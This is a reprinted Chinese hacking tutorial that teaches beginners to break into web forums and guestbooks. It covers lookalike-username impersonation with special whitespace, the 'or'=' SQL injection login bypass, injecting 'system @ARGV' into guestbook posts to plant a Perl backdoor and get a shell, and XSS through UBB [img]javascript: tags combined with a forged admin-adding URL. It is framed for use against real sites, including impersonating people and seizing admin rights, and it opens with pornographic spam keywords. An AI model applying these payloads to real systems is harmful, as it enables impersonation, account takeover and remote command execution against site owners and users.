中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

打破常規(guī) 構(gòu)造特殊字符進(jìn)行滲透入侵

2017-11-30    來源:

容器云強(qiáng)勢上線!快速搭建集群,上萬Linux鏡像隨意使用

  分析服務(wù)器的web程序,像論壇、聊天室了,發(fā)現(xiàn)其程序編寫的bug或疏漏,從而進(jìn)行80端口的滲透入侵,似乎只是黑客程序高手的事情。其實(shí)不然,雖然我們不會(huì)編寫程序,但是利用構(gòu)造特殊字符菜鳥一樣可以來進(jìn)行80端口的滲透入侵。不相信?那好,看我用特殊字符精心打造的的四把小李飛刀。

  第一把飛刀:魚目混珠

  我們可以用它實(shí)現(xiàn)在論壇里冒名發(fā)言。看中一個(gè)美眉,日思夜想想讓她在論壇里對全世界說我愛你,美眉就是不說怎么辦?打開記事本,按下tab鍵或capslock+tab鍵,就會(huì)形成一個(gè)特殊空格。然后復(fù)制下來,將空格放在美眉的名字后注冊,啊,果然成功注冊了和美眉一個(gè)同樣的名字,剩下來的事就好辦了。形成特殊空格的字符還有區(qū)位輸入法輸入的aaaa或aaab或aaac。還有一個(gè)字符是 ,在html標(biāo)簽里它就是空白的意思,用它也可以。我的經(jīng)驗(yàn)是區(qū)位輸入法輸入的aaaa/aaab/aaac,在asp編寫的程序里成功率極高,而tab鍵和 在php程序里成功率高。更可怕的是,在wdb論壇和ibb論壇,用tab鍵構(gòu)造的特殊用戶名可以取得和原用戶相同的權(quán)限。如果原用戶名是管理員,那你的構(gòu)造的這個(gè)冒名用戶也會(huì)變成管理員。

  第二把飛刀:瞞天過海

  在asp動(dòng)態(tài)網(wǎng)絡(luò)編程中,經(jīng)常會(huì)有驗(yàn)證管理員帳號和密碼的登陸頁面,以便進(jìn)行后臺管理。但是在這樣的身份驗(yàn)證里會(huì)存在一些漏洞,例如在用戶名和密碼框里都輸入'or'=',也可以進(jìn)入管理頁面。為什么會(huì)這樣?我簡單說一下?丛绦: user=request.form("user")

  pass=request.form("pass")

  ......

  sql="select * from guestbook where user ='"&user&"' and pass='"&pass&"'

  如果將user和pass的值我們都輸入'or'=',那么上邊的最后一行sql代碼就會(huì)變成

  sql="select * from guestbook where user ='or'='and pass='or'='"

  如果你懂一點(diǎn)sql語句的話,就可以看到,我們輸入的'or'='滿足了程序成真的條件值,所以我們就蒙敝過關(guān)了。這樣說太抽象了,信心文章管理系就存在這個(gè)漏洞,這套程序在網(wǎng)上一抓一大把。抓個(gè)圖看看,你用我提供的特殊字符,在帳號和密碼處都輸入'or'='就可以就入后臺管理了。

  第三把飛刀:暗渡陳倉

  最近網(wǎng)絡(luò)上出了不少關(guān)于入侵lb論壇的文章,無一例外,它們都談到了構(gòu)造特殊字符。眾所周知,如果在一個(gè)cgi或perl程序里寫入system @ARGV;#這一行代碼,就會(huì)形成一個(gè)網(wǎng)頁后門。用http://ip/*.pl?dir就會(huì)看到網(wǎng)站的物理目錄(*.pl文件里有system @ARGV;#這一行代碼)。舉個(gè)例子吧,agbii是一個(gè)免費(fèi)的cgi留言本,網(wǎng)上非常流行。而你在這個(gè)留言本里留的言都是以第n條留言的數(shù)目、用戶名、標(biāo)題、內(nèi)容等等來排列的,而且留的言的都是按第n條留言順序排放在一個(gè)固定目錄data/用戶名下。說起來好像很復(fù)雜。

  像我留了一條言,是這個(gè)網(wǎng)站留言本的第10條留言,我用的用戶名是;system,標(biāo)題是@ARGV;#,內(nèi)容是哈哈,仔細(xì)看簽寫留言的那個(gè)圖,此留言本的用戶就是222.然后我們執(zhí)行http://192.168.1.3/book/data/222/10.pl?dir就會(huì)得到一個(gè)shell了。

  第四把飛刀:太公釣魚

  這是一個(gè)比較有趣也比較難利用的方法,也就是網(wǎng)上所說的跨站腳本攻擊。我說一下,我們菜鳥可以利用的方法吧。先說一個(gè)有趣的,在ubb代碼中,就是我們在論壇里發(fā)貼的代碼有一個(gè)bug。在[img][/img]中如果你插入的不是圖像,而是一個(gè)javascript腳本,它同樣會(huì)執(zhí)行。我們在論壇里發(fā)一個(gè)貼子,內(nèi)容如下:[img]javascript:alert("黑客x檔案")[/img],當(dāng)你點(diǎn)這個(gè)貼子就會(huì)彈出一個(gè)js對話,上書黑客x檔案。

  寫入[img]javascript:alert("黑客x檔案");self.open("http://url")[/img],那么在彈出對話框后,又會(huì)接著打開一個(gè)新的網(wǎng)頁窗口。如果我們在這個(gè)網(wǎng)頁里放入網(wǎng)頁木馬呢?這里我們先不談網(wǎng)頁木馬。我們假如得知,如果這個(gè)論壇加一個(gè)管理員hack的url是http://ip/bbs/upadmin?user=hack,當(dāng)然這個(gè)url是要以管理員身份執(zhí)行才可以,那么我們寫入這個(gè)url,然后引誘這個(gè)論壇的真正管理員來看此貼,那么這個(gè)已登陸論壇的管理員點(diǎn)擊此貼后,hack這個(gè)個(gè)普通注冊用戶就會(huì)成為這個(gè)論壇的管理員了。類似的辦法,還有上傳附件。我們上傳一個(gè)txt附件,txt文件里就是這個(gè)加hack管理員的url,由于ie瀏覽器的bug,只要服務(wù)器網(wǎng)站文件里的文件是html碼它就執(zhí)行html網(wǎng)頁,并不理會(huì)后綴名是什么。管理員點(diǎn)此txt附件,同樣可以執(zhí)行增加hack管理員的url。至于在[img][/img]或txt文件里的html、javasripct碼我們可以精心構(gòu)造,可以讓論壇管理員點(diǎn)擊后毫無察覺發(fā)現(xiàn)自己執(zhí)行了一些url程序。

  最后說明,這四把飛刀并不是鋒利無比,在每個(gè)服務(wù)器上都可以刀刀封喉,但對網(wǎng)上的大多數(shù)論壇或聊室或別的網(wǎng)頁程序,還是......那句話......小李飛刀,名不虛傳。

標(biāo)簽: 代碼 服務(wù)器 腳本 漏洞 權(quán)限 網(wǎng)絡(luò) 網(wǎng)站 用戶

版權(quán)申明:本站文章部分自網(wǎng)絡(luò),如有侵權(quán),請聯(lián)系:west999com@outlook.com
特別注意:本站所有轉(zhuǎn)載文章言論不代表本站觀點(diǎn)!
本站所提供的圖片等素材,版權(quán)歸原作者所有,如需使用,請與原作者聯(lián)系。

上一篇:Win95.Troj.WinSKRBa

下一篇:Win32.Hack.CmjSpy.ap